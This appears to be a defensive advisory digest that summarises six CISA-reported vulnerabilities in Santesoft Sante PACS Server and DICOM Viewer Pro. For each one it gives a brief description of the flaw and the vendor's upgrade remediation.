These pages are published after PatchSiren validates generated defensive summaries against stored public CVE and source evidence.
CVE-2025-54862 affects Santesoft Sante PACS Server’s web portal and is described by CISA as a stored cross-site scripting issue. The advisory says an attacker could inject malicious HTML that redirects a user to a malicious webpage and steals the user’s cookie. CISA published the advisory on 2025-08-12 and the vendor remediation is to update to Sante PACS Server version 4.2.3 or later.
CVE-2025-54759 affects Santesoft Sante PACS Server and is described as a stored cross-site scripting issue. CISA’s advisory says a malicious actor could inject HTML that redirects a user to a harmful webpage and may steal the user’s cookie. Santesoft’s remediation is to update PACS Server to Version 4.2.3 or later.
CVE-2025-54156 affects Santesoft Sante PACS Server and is documented by CISA as an issue where the Web Portal sends credential information without encryption. The advisory rates the issue HIGH (CVSS 7.4) and recommends updating to version 4.2.3 or later. Organizations using the portal should treat this as a credential-protection problem that needs prompt remediation.
CVE-2025-53948 is a high-severity denial-of-service issue in Santesoft Sante PACS Server. According to the CISA advisory published on 2025-08-12, a remote attacker can send a crafted HL7 message that crashes the application's main thread. The affected service requires a manual restart, and no authentication is needed. Santesoft's recommended mitigation is to update PACS Server to version 4.2.3 or later.
CVE-2025-0572 is a network-reachable integrity issue in Santesoft Sante PACS Server's web portal. CISA's advisory says remote attackers can use DCM files to create arbitrary files on affected installations. The supplied CVSS v3.1 vector indicates low complexity, no user interaction, and low privileges, with integrity impact only. Santesoft's remediation is to update to Sante PACS Server 4.2.3 or later.
CVE-2025-5307 affects Santesoft Sante DICOM Viewer Pro and is described by CISA as a memory corruption vulnerability. The supplied advisory says a local attacker could potentially disclose information and execute arbitrary code on affected installations, and Santesoft recommends upgrading to version v14.2.2.